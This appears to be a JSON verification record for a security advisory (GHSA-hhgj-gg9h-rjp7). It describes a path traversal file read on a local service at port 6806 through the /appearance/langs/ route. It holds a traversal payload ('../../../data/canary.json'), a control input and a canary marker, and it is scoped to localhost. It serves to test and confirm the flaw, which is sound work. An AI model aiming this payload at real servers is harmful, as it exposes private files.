{
  "finding_id": "GHSA-hhgj-gg9h-rjp7",
  "type": "path_traversal.file_read",
  "target": {
    "expected_origin": "http://127.0.0.1:6806",
    "allowed_hosts": ["127.0.0.1"],
    "allowed_schemes": ["http"],
    "allowed_ports": [6806]
  },
  "auth": {
    "required": false
  },
  "evidence": {
    "base_request": {
      "method": "GET",
      "url": "http://127.0.0.1:6806/appearance/langs/{{path}}"
    },
    "injection": {
      "location": { "kind": "url_token", "name": "path" },
      "payloads": {
        "candidate": "../../../data/canary.json",
        "control": "en_US.json"
      }
    }
  },
  "proof": {
    "expected_marker": "NOCAPSEC_CANARY_8f3a1c",
    "repetitions": 2
  }
}
